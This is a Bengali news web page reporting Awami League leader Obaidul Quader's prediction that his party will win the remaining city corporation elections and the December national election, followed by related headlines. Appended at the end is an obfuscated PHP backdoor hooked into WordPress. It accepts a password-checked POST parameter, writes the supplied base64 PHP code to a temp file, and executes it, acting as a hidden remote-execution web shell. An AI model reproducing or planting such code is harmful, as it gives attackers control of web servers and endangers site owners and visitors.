বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

সিটি নির্বাচনঃ বাকি চারটিও জিতবে আ’লীগ বললেন কাদের

news-image

ডেস্ক রিপোর্ট : সড়ক পরিবহন ও সেতুমন্ত্রী ওবায়দুল কাদের বলেছেন খুলনায় আ’লীগ যেভাবে বিপুল ভোটে জয়লাভ করেছে ঠিক একই ভাবে বাকি গাজীপুর, রাজশাহী, বরিশাল এবং সিলেট সিটি করপোরেশন নির্বাচনেও আওয়ামী লীগ জিতবে বলে তিনি জানান। আর সিটি নির্বাচনে জয়ের ধারাবাহিকতায় আগামী জাতীয় নির্বাচনেও আওয়ামী লীগ আবার জিতবে বলেও নিশ্চিত তিনি।
সেতুমন্ত্রী বলেন, ‘গাজীপুর সিটি করপোরেশন নির্বাচন থেকে বিজয়ের ধারা আরও তিনটি সিটিকে বিজয়ের এগিয়ে নিয়ে আগামী ডিসেম্বরের জাতীয় নির্বাচনে শেখ হাসিনার নেতৃত্বে আবারও আমরা বিজয়ী হব।’গতকাল রোববার(০৩ জুন) সন্ধ্যায় বঙ্গবন্ধু অ্যাভিনিউয়ে যুবলীগ আয়োজিত ইফতার ও দোয়া মাহফিল অনুষ্ঠান শেষে দলের কার্যালয়ে এ ‍কথা বলেন কাদের।

গত ১৫ মে খুলনা সিটি করপোরেশন নির্বাচনে প্রতিদ্বন্দ্বী বিএনপিকে ৬৮ হাজার ভোটে হারিয়েছে আওয়ামী লীগ। যদিও ভোট নিয়ে আপত্তি আছে পরাজিত দলটির। তাদের অভিযোগ ২৮৯টি কেন্দ্রের মধ্যে ১০০টিতে কারচুপি হয়েছে।একই দিন ভোট হওয়ার কথা ছিল গাজীপুরে। ক্নিতু আদালতের রিট আবেদনের কারণে ভোট পিছিয়ে ২৬ জুন গেছে।

মন্ত্রী বলেন, ‘নেক্সট ইলেকশন হবে গাজীপুরে। জনগণ উন্নয়ন-অর্জনের যে ধারা রাষ্ট্রনায়ক শেখ হাসিনার নেতৃত্বে আজকে চলছে এবং যার সুফল গাজীপুরবাসী অলরেডি পেয়েছে এবং পাচ্ছে।’

২০১৩ সালের সিটি নির্বাচনে গাজীপুরে দেড় লাখ ভোটে হেরেছিলেন আওয়ামী লীগের প্রার্থী আজমত উল্যাহ খান। তবে এবার ভোটের ফল পক্ষে আসার ব্যাপারে নিশ্চিত কাদের। গাজীপুরের মানুষ গতবার যে ভুল করেছে, সেই ভুলের পুনরাবৃত্তি এবার তারা করতে চায় না। আমরা আশাবাদী গাজীপুরেও আমাদের প্রার্থী বিজয়ী হবে, নৌকা বিজয়ী হবে।

গাজীপুরের পর ৩০ জুলাই ভোট হবে রাজশাহী, বরিশাল ও সিলেট সিটি করপোরেশনে। সেখানেও জয় পাওয়ার বিষয়ে আত্মবিশ্বাসী আওয়ামী লীগ সাধারণ সম্পাদক।

‘আমরা আশা করি, নারায়ণগঞ্জে আমরা যে ধারার সূচনা করেছি এবং কুমিল্লা ও রংপুরে আমরা হেরেছি। কিন্তু এরপর খুলনায় বিজয়ী হয়েছি। এই বিজয়ের ধারা আগামী গাজীপুর থেকে আরও তিনটি সিটি করপোরেশন নির্বাচনের বিজয়কে এগিয়ে নিয়ে আগামী ডিসেম্বরের জাতীয় নির্বাচনে শেখ হাসিনার নেতৃত্বে আমরা আবারও বিজয়ী হবো।’‘কারণ, এই বাংলাদেশ এবার মুক্তিযুদ্ধের শক্তিকে বিজয়ী করবে। এই বাংলাদেশ লিবারেশন ওয়্যারের স্পিরিটকে ধারণ করবে।’

এ সময় গাজীপুর সিটি করপোরেশনে নির্বাচনে নৌকার প্রার্থীর পক্ষে নির্বাচনী প্রচার-প্রচারণার লক্ষ্যে যুবলীগ কেন্দ্রীয় কমিটি, ঢাকা মহানগর উত্তর ও দক্ষিণ এবং গাজীপুর মহানগর যুবলীগের পক্ষ থেকে টিমের তালিকা ওবায়দুল কাদেরের কাছে হস্তান্তর করা হয়।

যুবলীগ চেয়ারম্যান ওমর ফারুক চৌধুরীর সভাপতিত্ব ও যুগ্মসাধারণ সম্পাদক মহিউদ্দিন মহি অনুষ্ঠানটি পরিচালনা করেন। এতে আরও বক্তব্য রাখেন সাধারণ সম্পাদক হারুনুর রশীদ, সভাপতিমণ্ডলীর সদস্য নুরন্নবী চৌধুরী শাওন, কেন্দ্রীয় নির্বাহী সদস্য শেখ ফজলে ফাহিম, ঢাকা মহানগর দক্ষিণের সভাপতি ইসমাইল চৌধুরী সম্রাট, ঢাকা উত্তরের সভাপতি মাইনুল হোসেন খান নিখিল, সাধারণ সম্পাদক ইসমাইল হোসেনসহ বিভিন্ন জেলা সভাপতি ও সাধারণ সম্পাদকরা।

উপস্থিত ছিলেন সভাপতিমণ্ডলীর সদস্য মজিবুর রহমান চৌধুরী, আব্দুস সাত্তার মাসুদ, সম্পাদকমণ্ডলীর সদস্য কাজী আনিসুর রহমান, মিজানুল ইসলাম মিজু, সুভাষ চন্দ্র হাওলাদার, ইকবাল মাহমুদ বাবলু প্রমুখ।

এ জাতীয় আরও খবর

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

ঝলসে যাওয়া তাপমাত্রায় পুড়ছেন হজযাত্রীরা, বাড়ছে হতাহত

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}